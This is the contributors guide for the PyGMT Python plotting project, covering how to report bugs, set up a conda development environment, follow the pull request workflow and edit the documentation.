Pages that refer to this page: pthreads(7) | http://man7.org/linux/man-pages/man3/pthread_rwlockattr_setkind_np.3.html | CC-MAIN-2019-26 | en | refinedweb |
Upgrade your existing Service Bus standard namespaces to premium in-place
Posted on 02 April 2019
Our new migration tool is now available. Use it to upgrade existing multi-tenant Service Bus standard namespaces to dedicated premium namespaces, with no change in configuration. The existing connection string becomes an alias that, after migration, points to the premium namespace.
Switch to premium to enable enterprise capabilities, such as:
- Virtual network injection.
- IP filtering/firewalls.
- Availability zones.
- Geo-disaster recovery. | https://azure.microsoft.com/en-in/updates/upgrade-your-existing-service-bus-standard-namespaces-to-premium-in-place/ | CC-MAIN-2019-26 | en | refinedweb |
NetPeerTcpBinding Class
Definition
Warning
This API is now obsolete.
Provides a secure binding for peer-to-peer network applications.
public ref class NetPeerTcpBinding : System::ServiceModel::Channels::Binding, System::ServiceModel::Channels::IBindingRuntimePreferences
[System.Obsolete("PeerChannel feature is obsolete and will be removed in the future.", false)] public class NetPeerTcpBinding : System.ServiceModel.Channels.Binding, System.ServiceModel.Channels.IBindingRuntimePreferences
type NetPeerTcpBinding = class inherit Binding interface IBindingRuntimePreferences
Public Class NetPeerTcpBinding Inherits Binding Implements IBindingRuntimePreferences
- Inheritance: Binding → NetPeerTcpBinding
- Attributes: ObsoleteAttribute
- Implements: IBindingRuntimePreferences
Remarks. | https://docs.microsoft.com/en-us/dotnet/api/system.servicemodel.netpeertcpbinding?redirectedfrom=MSDN&view=netframework-4.8 | CC-MAIN-2019-26 | en | refinedweb |
Definitions for supported audio routing configurations.
The audio manager maintains the audio routing logic based on registered audio sources. This file defines routing properties and provides functions for them. The following are examples of using audio routing.
This example shows how to get an audio handle and set its type for a libasound channel. The example is for playback, but the audio manager specific steps are the same for recording. The example acquires an audio manager handle of type AUDIO_TYPE_ALERT, and sets it to become active only when PCM audio is actually playing (this is done via the suspended flag). The audio manager handle is bound to a libasound PCM handle, and freed when the program ends.
#include <audio/audio_manager_routing.h>
#include <sys/asoundlib.h>

void main(void) {
    unsigned int audioman_handle;
    snd_pcm_t *pcm_handle;

    // Acquire an audioman handle. Start it "suspended", which means that its
    // ducking and routing rules only become active when the PCM channel is
    // actually playing.
    if ( audio_manager_get_handle ( AUDIO_TYPE_ALERT, // Audio Type
                                    0,    // pid that owns handle. 0 = this process
                                    true, // Start "suspended"
                                    &audioman_handle ) < 0 ) {
        printf("Could not get an audioman handle of the requested type\n");
        return;
    }

    // Acquire a pcm channel from libasound for playback
    snd_pcm_open ( &pcm_handle, "/dev/snd/pcmPreferred", SND_PCM_OPEN_PLAYBACK );

    // Bind the pcm_handle with the audioman handle.
    if ( snd_pcm_set_audioman_handle( pcm_handle, audioman_handle ) < 0 ) {
        printf("Could not set the pcm_handle with the audioman_handle\n");
    }

    // Do what you would normally do here with libasound...
    // ...

    // Cleanup
    snd_pcm_close( pcm_handle );
    audio_manager_free_handle( audioman_handle );
}
The audio type AUDIO_TYPE_ALERT, when active, will follow the routing of other active audio because it is lowest priority in the routing table. If nothing else is playing, it will force routing to be through the loud speaker, regardless of what other devices are connected.
For concurrency, if there is an AUDIO_TYPE_DEFAULT playing concurrently (which is the case for any stream that does not explicitly use the audio manager), when the AUDIO_TYPE_ALERT becomes active, it will cause the AUDIO_TYPE_DEFAULT stream to become attenuated.
Alternatively, you can use utility functions in audio_manager_routing.h to implicitly handle the setup in one call. Note that the audioman_handle starts up suspended:
#include <audio/audio_manager_routing.h>
#include <sys/libasound.h>

void main(void) {
    unsigned int audioman_handle;
    snd_pcm_t *pcm_handle;

    if (audio_manager_snd_pcm_open_name( AUDIO_TYPE_ALERT,
                                         &pcm_handle,
                                         &audioman_handle,
                                         "/dev/snd/pcmPreferred",
                                         SND_PCM_OPEN_PLAYBACK ) < 0 ) {
        printf("Failed to open an audioman pcm channel\n");
        return;
    }

    // Do what you would normally do with libasound...
    // ...

    // Cleanup
    snd_pcm_close( pcm_handle );
    audio_manager_free_handle( audioman_handle );
}
This example shows how to set the audio type for an mm-renderer application. The code that follows sets the audio type of the mm-renderer context to AUDIO_TYPE_ALERT. Currently, the "audio_type" output parameter

// Set audio type by setting "audio_type" when calling mmr_output_parameters()
strm_dict_t* dict = strm_dict_new();
dict = strm_dict_set( dict, "audio_type",
                      audio_manager_get_name_from_type(AUDIO_TYPE_ALERT));
mmr_output_parameters( context, output_id, dict );

//
// Attach input here
//

// Play audio
mmr_play( context );

// ....

//
// Cleanup
//
strm_dict_destroy( dict );
mmr_context_destroy(context);
mmr_disconnect(connection);
}
There may be times when an application needs to do some advanced routing. For example, an application may want to do its own custom audio routing, instead of using the default audio routing provided by audio manager. In that case, an application may request a handle from audio manager and then pass this handle to mm-renderer. This way, the mm-renderer context is bound to the audio manager handle.
Your application can pass the audio manager handle to mm-renderer by calling the function mmr_output_parameters() and specifying "audioman_handle". Note that setting the "audioman_handle" parameter

// Get an audio manager handle from Audio Manager and then convert it to a string
// so that it can be passed to mm-renderer.
// This call will activate the audio manager handle immediately (notice the
// suspended parameter is set to false).
uint32_t audioman_handle;
audio_manager_get_handle(AUDIO_TYPE_DEFAULT, getpid(), false, &audioman_handle);
char audioman_handle_str[15];
itoa(audioman_handle, audioman_handle_str, 10);

// Set audio manager handle by setting "audioman_handle" when calling mmr_output_parameters()
strm_dict_t* dict = strm_dict_new();
dict = strm_dict_set( dict, "audioman_handle", audioman_handle_str);
mmr_output_parameters( context, output_id, dict );

//
// Attach input here
//

// Play audio
mmr_play( context );

// ....

//
// Cleanup
//
strm_dict_destroy( dict );
mmr_context_destroy(context);
mmr_disconnect(connection);
}
This example shows how to override the default routing for an audio type. In this example, because we are not actually binding a libasound pcm handle to the audioman handle, we start the audioman handle as not suspended so that the routing and concurrency policy changes take effect right away. This will force the output routing to speaker, and leave the input routing up to the default routing table. The routing override is in effect as long as the audioman_handle's type is the highest priority routing type currently active. Note that if there are multiple handles of the same type active at the same time, then it is a last-one-wins policy.
#include <audio/audio_manager_routing.h>

void main(void) {
    unsigned int audioman_handle;

    // Acquire an audioman handle. Start it "unsuspended", which means that its
    // ducking and routing rules take effect immediately.
    if (audio_manager_get_handle(AUDIO_TYPE_DEFAULT, // Type default
                                 0,     // This pid
                                 false, // Start "unsuspended"
                                 &audioman_handle) == EOK) {
        // Use audio_manager_set_handle_type to also override the routing paths
        if (audio_manager_set_handle_type(audioman_handle,      // audioman handle
                                          AUDIO_TYPE_DEFAULT,   // Use the same type
                                          AUDIO_DEVICE_SPEAKER, // Force routing to loud speaker for output
                                          AUDIO_DEVICE_DEFAULT  // No preference for the input routing
                                          ) == EOK) {
            // Do what you would normally do here with libasound...
            // ...
        }
        audio_manager_free_handle(audioman_handle);
    } else {
        // Handle error as desired.
        // You may want to proceed with what you would normally do here
        // with libasound...
        // ...
    }
}
If you are an advanced user of drawRect on your ipop*, you will know that of course drawRect will not actually run until "all processing is finished." setNeedsDisplay flags a view as invalidated and the OS, in a word, waits until all processing is done. This can be infuriating in the common situation where you want to have:
1. a view controller
2. starts some function
3. which incrementally
4. creates a more and more complicated artwork and
5. at each step, you setNeedsDisplay (wrong!)
6. until all the work is done
Of course, when you do that, all that happens is that drawRect is run once only after step 6. What you want is for the ^&£@%$@ view to be refreshed at point 5. This can lead to you smashing your ipops on the floor, scanning Stackoverflow for hours, screaming at the kids more than necessary about the dangers of crossing the street, etc etc. What to do?
Footnotes:
* ipop: i Pad Or Phone !
Solution to the original question..............................................
In a word, you can (A) background the large painting, and call to the foreground for UI updates or (B) arguably controversially there are four 'immediate' methods suggested that do not use a background process. For the result of what works, run the demo program. It has #defines for all five methods.
Truly astounding alternate solution introduced by Tom Swift..................
Tom Swift has explained the amazing idea of quite simply manipulating the run loop. Here's how you trigger the run loop:
[[NSRunLoop currentRunLoop] runMode: NSDefaultRunLoopMode beforeDate: [NSDate date]];
This is a truly amazing piece of engineering. Of course one should be extremely careful when manipulating the run loop and as many pointed out this approach is strictly for experts.
The Bizarre Problem That Arises..............................................
Even though a number of the methods work, they don't actually "work" because there is a bizarre progressive-slow-down artifact you will see clearly in the demo.
Scroll to the 'answer' I pasted in below, showing the console output - you can see how it progressively slows.
Here's the new SO question:
Mysterious "progressive slowing" problem in run loop / drawRect.
Here is V2 of the demo app...
You will see it tests all five methods,
#ifdef TOMSWIFTMETHOD
    [self setNeedsDisplay];
    [[NSRunLoop currentRunLoop] runMode:NSDefaultRunLoopMode beforeDate:[NSDate date]];
#endif

#ifdef HOTPAW
    [self setNeedsDisplay];
    [CATransaction flush];
#endif

#ifdef LLOYDMETHOD
    [CATransaction begin];
    [self setNeedsDisplay];
    [CATransaction commit];
#endif

#ifdef DDLONG
    [self setNeedsDisplay];
    [[self layer] displayIfNeeded];
#endif

#ifdef BACKGROUNDMETHOD
    // here, the painting is being done in the bg, we have been
    // called here in the foreground to inval
    [self setNeedsDisplay];
#endif
You can see for yourself which methods work and which do not.
you can see the bizarre "progressive-slow-down". why does it happen?
you can see with the controversial TOMSWIFT method, there is actually no problem at all with responsiveness. tap for response at any time. (but still the bizarre "progressive-slow-down" problem)
So the overwhelming thing is this weird "progressive-slow-down": on each iteration, for unknown reasons, the time taken for a loop increases. Note that this applies both to doing it "properly" (background loop) and to using one of the 'immediate' methods.
Practical solutions ........................
For anyone reading in the future, if you are actually unable to get this to work in production code because of the "mystery progressive slowdown" ... Felz and Void have each presented astounding solutions in the other specific question, hope it helps. | https://blog.csdn.net/dqjyong/article/details/17204991 | CC-MAIN-2019-26 | en | refinedweb |
#include <wx/mstream.h>
This class allows using all methods taking a wxInputStream reference to read in-memory data.
Example:
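The example snippet itself appears to have been lost in this copy; a minimal sketch of the intended usage (an assumption on my part, not the original wxWidgets example) could be:

```cpp
#include <wx/mstream.h>
#include <wx/image.h>

// Wrap an in-memory buffer so it can be consumed by any API that takes a
// wxInputStream - here, loading an image from bytes already in memory.
void LoadImageFromMemory(const void *data, size_t len)
{
    wxMemoryInputStream stream(data, len);  // does not take ownership of data
    wxImage image;
    image.LoadFile(stream, wxBITMAP_TYPE_PNG);
}
```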
Initializes a new read-only memory stream which will use the specified buffer data of length len.
The stream does not take ownership of the buffer, i.e. the buffer will not be deleted in its destructor.
Creates a new read-only memory stream, initializing it with the data from the given output stream stream.
Creates a new read-only memory stream, initializing it with the data from the given input stream stream.
The len argument specifies the amount of data to read from the stream. Setting it to wxInvalidOffset means that the stream is to be read entirely (i.e. till the EOF is reached).
Destructor.
Does NOT free the buffer provided in the ctor.
Returns the pointer to the stream object used as an internal buffer for that stream. | https://docs.wxwidgets.org/trunk/classwx_memory_input_stream.html | CC-MAIN-2019-26 | en | refinedweb |
Hi* > I wonder if suggesting FFBE_32 and av_bswap_32 everywhere has much of a > chance. i definitly want these to be available to the outside of libav so if we dont find another solution then iam fine with these but it really would be nicer if a user app could use BE_32 instead of FFBE_32 maybe some #ifdef AV_NO_PREFIXES #define BE_32 FFBE_32 ... #endif in libavutil or similar could be | http://ffmpeg.org/pipermail/ffmpeg-cvslog/2006-December/001802.html | CC-MAIN-2022-27 | en | refinedweb |
Add digital signature or digitally sign PDF in C#
Aspose.PDF for .NET supports digitally signing PDF files using the SignatureField class. You can also certify a PDF file with a PKCS12 certificate, similar to Adding Signatures and Security in Adobe Acrobat.
In other words, the document would still be considered to retain its integrity and the recipient could still trust the document. For further details, please visit Certifying and signing a PDF. In general, certifying a document can be compared to Code-signing a .NET executable.
Aspose.PDF for .NET signing features
We can use the following classes and methods for PDF signing:
- Class DocMDPSignature
- Enumeration DocMDPAccessPermissions
- Property IsCertified in PdfFileSignature class
Sign PDF with digital signatures
public static void SignDocument()
{
    string inFile = System.IO.Path.Combine(_dataDir, "DigitallySign.pdf");
    string outFile = System.IO.Path.Combine(_dataDir, "DigitallySign_out.pdf");
    using (Document document = new Document(inFile))
    {
        using (PdfFileSignature signature = new PdfFileSignature(document))
        {
            PKCS7 pkcs = new PKCS7(@"C:\Keys\test.pfx", "Pa$$w0rd2020");
            // Use PKCS7/PKCS7Detached objects
            signature.Sign(1, true, new System.Drawing.Rectangle(300, 100, 400, 200), pkcs);
            // Save output PDF file
            signature.Save(outFile);
        }
    }
}
Add timestamp to digital signature
How to digitally sign a PDF with timestamp
Aspose.PDF for .NET supports digitally signing a PDF with a timestamp server or web service.
In order to accomplish this requirement, the TimestampSettings class has been added to the Aspose.PDF namespace. Please take a look at the following code snippet which obtains timestamp and adds it to PDF document:
public static void SignWithTimeStampServer()
{
    using (Document document = new Document(System.IO.Path.Combine(_dataDir, "SimpleResume.pdf")))
    {
        using (PdfFileSignature signature = new PdfFileSignature(document))
        {
            PKCS7 pkcs = new PKCS7(@"C:\Keys\test.pfx", "Start2020");
            TimestampSettings timestampSettings = new TimestampSettings("", string.Empty); // User/Password can be omitted
            pkcs.TimestampSettings = timestampSettings;
            System.Drawing.Rectangle rect = new System.Drawing.Rectangle(100, 100, 200, 100);
            // Create any of the three signature types
            signature.Sign(1, "Signature Reason", "Contact", "Location", true, rect, pkcs);
            // Save output PDF file
            signature.Save(System.IO.Path.Combine(_dataDir, "DigitallySignWithTimeStamp_out.pdf"));
        }
    }
}
conan export-pkg¶
$ conan export-pkg [-h] [-bf BUILD_FOLDER] [-f] [-if INSTALL_FOLDER] [-pf PACKAGE_FOLDER] [-sf SOURCE_FOLDER] [-j JSON] [-l [LOCKFILE]] [--ignore-dirty] [-e ENV_HOST] [-e:b ENV_BUILD] [-e:h ENV_HOST] [-o OPTIONS_HOST] [-o:b OPTIONS_BUILD] [-o:h OPTIONS_HOST] [-pr PROFILE_HOST] [-pr:b PROFILE_BUILD] [-pr:h PROFILE_HOST] [-s SETTINGS_HOST] [-s:b SETTINGS_BUILD] [-s:h SETTINGS_HOST] path [reference]
Exports a recipe, then creates a package from local source and build folders.
If ‘–package-folder’ is provided it will copy the files from there, otherwise, it will execute package() method over ‘–source-folder’ and ‘–build-folder’ to create the binary package.
positional arguments:
  path                  Path to a folder containing a conanfile.py or to a
                        recipe file e.g., my_folder/conanfile.py
  reference             user/channel or pkg/version@user/channel (if name
                        and version are not declared in the conanfile.py)

optional arguments:
  -h, --help            show this help message and exit
  -bf BUILD_FOLDER, --build-folder BUILD_FOLDER
                        Directory for the build process. Defaulted to the
                        current directory. A relative path to the current
                        directory can also be specified
  -f, --force           Overwrite existing package if existing
  -if INSTALL_FOLDER, --install-folder INSTALL_FOLDER
                        Directory containing the conaninfo.txt and
                        conanbuildinfo.txt files (from previous 'conan
                        install'). Defaulted to --build-folder. If these
                        files are found in the specified folder and any of
                        '-e', '-o', '-pr' or '-s' arguments are used, it
                        will raise an error.
  -pf PACKAGE_FOLDER, --package-folder PACKAGE_FOLDER
                        folder containing a locally created package. If a
                        value is given, it won't call the recipe 'package()'
                        method, and will run a copy of the provided folder.
  -sf SOURCE_FOLDER, --source-folder SOURCE_FOLDER
                        Directory containing the sources. Defaulted to the
                        conanfile's directory. A relative path to the
                        current directory can also be specified
  -j JSON, --json JSON  Path to a json file where the install information
                        will be written
The export-pkg command lets you create a package from already existing files in your working folder. It can be useful if you are using a build process external to Conan and do not want to provide it with the recipe. Nevertheless, you should take into account that it will generate a package and Conan won't be able to guarantee its reproducibility or regenerate it again. This is not the normal or recommended flow for creating Conan packages.
Execution of this command will result in several files copied to the package folder in the cache identified by its package_id (Conan will perform all the required actions to compute this _id_: build the graph, evaluate the requirements and options, and call any required method), but there could be two different sources for the files:
- If the argument --package-folder is provided, Conan will just copy all the contents of that folder to the package one in the cache.
- If no --package-folder is given, Conan will execute the method package() once and the self.copy(...) functions will copy matching files from the source_folder and build_folder to the corresponding path in the Conan cache (working directory corresponds to the build_folder).
- If the arguments --package-folder, --build-folder or --source-folder are declared, but the path is incorrect, export-pkg will raise an exception.
There are different scenarios where this command could look like useful:
- You are working locally on a package and you want to upload it to the cache to be able to consume it from other recipes. In this situation you can use the export-pkg command to copy the package to the cache, but you could also put the package in editable mode and avoid this extra step.
- You only have precompiled binaries available, then you can use the export-pkg to create the Conan package, or you can build a working recipe to download and package them. These scenarios are described in the documentation section How to package existing binaries.
Note
Note that if --profile, settings or options are not provided to export-pkg, the configuration will be extracted from the information stored after a previous conan install. That information might be incomplete in some edge cases, so we strongly recommend the usage of --profile or --settings, --options, etc.
Examples
Create a package from a directory containing the binaries for Windows/x86/Release:
We need to collect all the files from the local filesystem and tell Conan to compute the proper package_id so it gets associated with the correct settings and works when consuming it.
If the files in the working folder are:
Release_x86/lib/libmycoollib.a Release_x86/lib/other.a Release_x86/include/mylib.h Release_x86/include/other.h
then, just run:
$ conan new hello/0.1 --bare # It creates a minimum recipe example $ conan export-pkg . hello/0.1@user/stable -s os=Windows -s arch=x86 -s build_type=Release --package-folder=Release_x86
This last command will copy all the contents from the package-folder and create the package associated with the settings provided through the command line.
Create a package from a source and build folder:
The objective is to collect the files that will be part of the package from the source folder (include files) and from the build folder (libraries), so, if these are the files in the working folder:
sources/include/mylib.h sources/src/file.cpp build/lib/mylib.lib build/lib/mylib.tmp build/file.obj
we would need a slightly more complicated conanfile.py than in the previous example to select which files to copy; we need to change the patterns in the package() method:
def package(self): self.copy("*.h", dst="include", src="include") self.copy("*.lib", dst="lib", keep_path=False)
Now, we can run Conan to create the package:
$ conan export-pkg . hello/0.1@user/stable -pr:host=myprofile --source-folder=sources --build-folder=build | https://docs.conan.io/en/1.31/reference/commands/creator/export-pkg.html | CC-MAIN-2022-27 | en | refinedweb |
On Fri, Jan 13, 2017 at 10:04:34AM -0500, Sam Hartman wrote: > >>>>> "Josh" == Josh Triplett <josh@joshtriplett.org> writes: > > Josh> As another technical alternative, which I haven't seen > Josh> mentioned elsewhere in this thread or related bug reports: > Josh> when I need to override a packaged binary or file temporarily > Josh> for debugging purposes, without forgetting to restore it > Josh> later, I tend to use "mount --bind /my/replacement > Josh> /usr/bin/foo". For instance, for local testing while > Josh> developing dh-cargo, which required a newer version of Cargo > Josh> than packaged in Debian at the time, I built a local version > Josh> of Cargo and did "mount --bind ~/src/cargo/target/debug/cargo > Josh> /usr/bin/cargo". That allowed me to easily test-build > Josh> packages before the availability of a Debian package of a > Josh> sufficiently new Cargo. > > O, cool, that's really need. > > And as a throw-back to an alternate Plan9 history, you could presumably > unshare your mount namespace and even do that for a subset of the > processes on a system, getting almost all the benefits of PATH. Yes. Years ago, when Debian transitioned /bin/sh from bash to dash, Marco d'Itri posted a sample workaround for any scripts assuming bash, which involved unsharing the mount namespace, bind-mounting /bin/bash over /bin/sh, and then exec'ing a program. | https://lists.debian.org/debian-ctte/2017/01/msg00035.html | CC-MAIN-2022-27 | en | refinedweb |
First solution in Uncategorized category for Say Hi by ppitek40
# 1. on CheckiO your solution should be a function
# 2. the function should return the right answer, not print it.
def say_hi(name, age):
    siedem = "Hi. My name is " + name + " and I'm " + str(age) + " years old"
    return siedem

9, 2017
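A quick check of the solution (the function is restated here so the snippet runs on its own):

```python
def say_hi(name, age):
    siedem = "Hi. My name is " + name + " and I'm " + str(age) + " years old"
    return siedem

print(say_hi("Alex", 32))  # Hi. My name is Alex and I'm 32 years old
```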
Dear all,
I would like to write my user class (created in C++ with dictionary generated) as TTree Branch in pyroot.
My user class is named ‘Source’ and inherits from another user class (inheriting from TNamed). The class is defined inside a user namespace (e.g. ‘MyLib’).
In C++ I am able to write the class to TTree (and reading it afterwards) using these sample code:
//Init
source= nullptr;
f= new TFile("out.root","RECREATE");
tree= new TTree("tree","tree");
tree->Branch("Source",&source);

//Create object and fill tree
s1= new MyLib::Source();
//set object parameters here
//...
source= s1;
tree->Fill();

//Write tree to file
f->cd();
tree->Write();
f->Close();
In python I am doing the following:
## Load modules
# - ROOT
import ROOT
from ROOT import gSystem, TFile, TTree, gROOT, AddressOf
# - My library
gSystem.Load('libMyLib')
from ROOT import MyLib

## Init
f= ROOT.TFile('test.root','RECREATE')
tree= ROOT.TTree('tree','tree')
source= MyLib.Source()
tree.Branch('Source',source)

## Create object and fill tree
s1= MyLib.Source()
# Set parameters here
s1.Id= 1
s1.Name= 's1'
# ...
source= s1
source.Print()  # Here I print correctly the object attributes set before
tree.Fill()

## Write file
f.cd()
tree.Write()
f.Close()
The object is written to tree and accessible in file, but when I try to browse it (tree->Show(0)) the object parameters written are those initialized in the constructor (dummy values) and NOT those set at runtime (e.g. Id=1, Name=“s1”, etc).
For sure I am missing something trivial in python here (e.g. references).
For example copying s1 to source seems to work:
s1.Copy(source) # instead of source=s1
Could you in case help me to understand the problem and suggest the correct approach?
Thank you very much for your help,
Simone | https://root-forum.cern.ch/t/pyroot-troubles-writing-user-class-to-ttree/26251 | CC-MAIN-2022-27 | en | refinedweb |
I have an addon that basically is able to convert CSV files into JSONs or dictionaries. It used to work well with the scripting mode set to "classic"; however, this option is no longer available, and my app throws an error when executing and ceases to function.
I'm using papaparse in order to convert CSV files, and I'm not able to import the "Papa" object into the "expressions.js" file where I have the code that Construct 3 executes at runtime. With the "classic" scripting mode I could simply use the object, but now it throws an error since it is "undefined". The following snapshot will give you a glance at how the plugin is set up and what my code looks like, as well as the error that it produces:
What I tried first was importing the module using the following statement in the "expressions.js" file, right below the "use strict" directive:

import * as Papa from '../lib/papaparse.min.js'
Sadly, an error is thrown indicating that the module can't be loaded. I'm guessing that the path is no longer correct once Construct exports the addon and is using it at runtime.
The file is included in the "addon.json" file's "file-list", and is also indicated as a dependency in the plugin.js file:

this._info.AddFileDependency({
    filename: "lib/papaparse.min.js",
    type: "external-runtime-script"
});
- How should I import a module with the new scripting system, if not the way I'm doing it nor what I tried to do already?
- Could you point me to an addon that is using a library in a similar way, so I can figure it out through reverse engineering?
Thank you very much, I look forward to your answers!
I would guess you just need to access any global variables via globalThis, as described by our guide on changes for modules.
Thank you for your answer Ashley, I was able to solve the problem thanks to it. I'm now going to elaborate a bit on what I had to do exactly, in case anyone else runs into a similar problem, but before that I'd like to take this chance to tell you that I love Construct, congratulations on a great game engine!
Contrary to what I believed, the error wasn't produced by the piece of code I took the screenshot of (expressions.js). It was produced by the "papaparse.js" library!
It was the "root" parameter that was undefined. I simply had to substitute it with "globalThis", as Ashley indicated, and do the same to access the "Papa" object from "expressions.js".
Would it be possible for Construct to pass the "globalThis" object through the "root" parameter whenever this function is called? This would allow libraries using this standard to be imported into Construct without having to modify them.
Just an uninformed suggestion, please correct me if this is not possible
Thanks again! | https://www.construct.net/en/forum/construct-3/plugin-sdk-10/usage-importexport-within-161196 | CC-MAIN-2022-27 | en | refinedweb |
Get the priority of a given process
#include <sched.h> int getprio( pid_t pid );
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
The getprio() function returns the current priority of thread 1 in process pid. If pid is zero, the priority of the calling thread is returned.
The getprio() and setprio() functions are included in the QNX Neutrino libraries for porting QNX 4 applications. For new programs, use pthread_getschedparam(). | http://www.qnx.com/developers/docs/qnxcar2/topic/com.qnx.doc.neutrino.lib_ref/topic/g/getprio.html | CC-MAIN-2022-27 | en | refinedweb |
Contributors Guide
This is a community driven project and everyone is welcome to contribute.
The project is hosted at the PyGMT GitHub repository.
The goal is to maintain a diverse community that’s pleasant for everyone. Please be considerate and respectful of others. Everyone must abide by our Code of Conduct and we encourage all to read it carefully.
Ways to Contribute
Ways to Contribute Documentation and/or Code
Tackle any issue that you wish! Some issues are labeled as “good first issues” to indicate that they are beginner friendly, meaning that they don’t require extensive knowledge of the project.
Make a tutorial or gallery example of how to do something.
Improve the API documentation.
Contribute code! This can be code that you already have and it doesn’t need to be perfect! We will help you clean things up, test it, etc.
Ways to Contribute Feedback
Ways to Contribute to Community Building
Participate and answer questions on the PyGMT forum Q&A.
Participate in discussions at the quarterly PyGMT Community Meetings, which are announced on the forum governance page.
Cite PyGMT when using the project.
Spread the word about PyGMT or star the project!
Providing Feedback
Reporting a Bug
Find the Issues tab on the top of the GitHub repository and click New Issue.
Click on Get started next to Bug report.
Please try to fill out the template with as much detail as you can.
After submitting your bug report, try to answer any follow up questions about the bug as best as you can.
Reporting upstream bugs
If you are aware that a bug is caused by an upstream GMT issue rather than a PyGMT-specific issue, you can optionally take the following steps to help resolve the problem:
Add the line pygmt.config(GMT_VERBOSE='d') after your import statements, which will report the equivalent GMT commands as one of the debug messages.
Either append all messages from running your script to your GitHub issue, or filter the messages to include only the GMT-equivalent commands using a command such as:
python <test>.py 2>&1 | awk -F': ' '$2=="GMT_Call_Command string" {print "gmt", $3}'
where <test> is the name of your test script.
If the bug is produced when passing an in-memory data object (e.g., a pandas.DataFrame or xarray.DataArray) to a PyGMT function, try writing the data to a file (e.g., a NetCDF or ASCII txt file) and passing the data file to the PyGMT function instead. In the GitHub issue, please share the results for both cases along with your code.
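The file-based workaround in the last step can be sketched with the standard library alone; the `fig.plot` call in the comment and the file name `data.txt` are illustrative — substitute whatever PyGMT call triggers the bug:

```python
import csv

# Hypothetical in-memory data that triggers the bug when passed directly.
rows = [(0.0, 1.5), (1.0, 2.5), (2.0, 3.5)]

# Write the same data to a plain ASCII file instead.
with open("data.txt", "w", newline="") as f:
    writer = csv.writer(f, delimiter="\t")
    writer.writerows(rows)

# Then pass the file name to the PyGMT function, e.g.:
#   fig.plot(data="data.txt", style="c0.2c", fill="red")
# and report in the issue whether the file-based call behaves differently
# from passing `rows` directly.
```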
Submitting a Feature Request
Submitting General Comments/Questions
There are several pages on the Community Forum where you can submit general comments and/or questions:
For questions about using PyGMT, select New Topic from the PyGMT Q&A Page.
For general comments, select New Topic from the Lounge Page.
To share your work, select New Topic from the Showcase Page.
General Guidelines
Resources for New Contributors
Please take a look at these resources to learn about Git and pull requests (don’t hesitate to ask questions):
Getting Help
Discussion often happens on GitHub issues and pull requests. In addition, there is a Discourse forum for the project where you can ask questions.
Pull Request Workflow
We follow the git pull request workflow to make changes to our codebase. Every change made goes through a pull request, even our own, so that our continuous integration services have a chance to check that the code is up to standards and passes all our tests. This way, the main branch is always stable.
General Guidelines for Making a Pull Request (PR):
What should be included in a PR
Have a quick look at the titles of all the existing issues first. If there is already an issue that matches your PR, leave a comment there to let us know what you plan to do. Otherwise, open an issue describing what you want to do.
Each pull request should consist of a small and logical collection of changes; larger changes should be broken down into smaller parts and integrated separately.
Bug fixes should be submitted in separate PRs.
How to write and submit a PR
Use underscores for all Python (*.py) files as per PEP8, not hyphens. Directory names should also use underscores instead of hyphens.
Describe what your PR changes and why this is a good thing. Be as specific as you can. The PR description is how we keep track of the changes made to the project over time.
Do not commit changes to files that are irrelevant to your feature or bugfix (e.g.:
.gitignore, IDE project files, etc).
Write descriptive commit messages. Chris Beams has written a guide on how to write good commit messages.
PR review
Be willing to accept criticism and work on improving your code; we don’t want to break other users’ code, so care must be taken not to introduce bugs.
Be aware that the pull request review process is not immediate, and is generally proportional to the size of the pull request.
General Process for Pull Request Review:
After you’ve submitted a pull request, you should expect to hear at least a comment within a couple of days. We may suggest some changes, improvements or alternative implementation details.
To increase the chances of getting your pull request accepted quickly, try to:
Submit a friendly PR
Write a good and detailed description of what the PR does.
Write some documentation for your code (docstrings) and leave comments explaining the reason behind non-obvious things.
Write tests for the code you wrote/modified if needed. Please refer to Testing your code or Testing plots.
Include an example of new features in the gallery or tutorials. Please refer to Gallery plots or Tutorials.
Have a good coding style
Use readable code, as it is better than clever code (even with comments).
Follow the PEP8 style guide for code and the NumPy style guide for docstrings. Please refer to Code style.
Pull requests will automatically have tests run by GitHub Actions. This includes running both the unit tests as well as code linters. GitHub will show the status of these checks on the pull request. Try to get them all passing (green). If you have any trouble, leave a comment in the PR or get in touch.
Setting up your Environment
These steps for setting up your environment are necessary for editing the documentation locally and contributing code. A local PyGMT development environment is not needed for editing the documentation on GitHub.
We highly recommend using Anaconda and the
conda
package manager to install and manage your Python packages.
It will make your life a lot easier!
The repository includes a conda environment file
environment.yml with the
specification for all development requirements to build and test the project.
In particular, these are some of the key development dependencies you will need
to install to build the documentation and run the unit tests locally:
git (for cloning the repo and tracking changes in code)
dvc (for downloading baseline images used in tests)
pytest-mpl (for checking that generated plots match the baseline)
sphinx-gallery (for building the gallery example page)
See the
environment.yml
file for the full list of dependencies and the environment name (
pygmt).
Once you have forked and cloned the repository to your local machine, you can
use this file to create an isolated environment on which you can work.
Run the following on the base of the repository to create a new conda
environment from the
environment.yml file:
conda env create --file environment.yml
Before building and testing the project, you have to activate the environment (you’ll need to do this every time you start a new terminal):
conda activate pygmt
We have a
Makefile
that provides commands for installing, running the tests and coverage analysis,
running linters, etc. If you don’t want to use
make, open the
Makefile and
copy the commands you want to run.
To install the current source code into your testing environment, run:
make install                # on Linux/macOS
pip install --no-deps -e .  # on Windows
This installs your project in editable mode, meaning that changes made to the source code will be available when you import the package (even if you’re on a different directory).
Contributing Documentation
PyGMT Documentation Overview
There are four main components to PyGMT’s documentation:
Gallery examples, with source code in Python *.py files under the examples/gallery/ folder.
Tutorial examples, with source code in Python *.py files under the examples/tutorials/ folder.
API documentation, with source code in the docstrings in Python *.py files under the pygmt/src/ and pygmt/datasets/ folders.
Getting started/developer documentation, with source text in ReST *.rst and markdown *.md files under the doc/ folder.
The documentation are written primarily in reStructuredText and built by Sphinx. Please refer to reStructuredText Cheatsheet if you are new to reStructuredText. When contributing documentation, be sure to follow the general guidelines in the pull request workflow section.
There are two primary ways to edit the PyGMT documentation:
For simple documentation changes, you can easily edit the documentation on GitHub. This only requires you to have a GitHub account.
For more complicated changes, you can edit the documentation locally. In order to build the documentation locally, you first need to set up your environment.
Editing the Documentation on GitHub
If you’re browsing the documentation and notice a typo or something that could be improved, please consider letting us know by creating an issue or (even better) submitting a fix.
You can submit fixes to the documentation pages completely online without having to download and install anything:
On each documentation page, there should be an “Improve This Page” link at the very top.
Click on that link to open the respective source file (usually an .rst file in the doc/ folder or a .py file in the examples/ folder) on GitHub for editing online (you’ll need a GitHub account).
Make your desired changes.
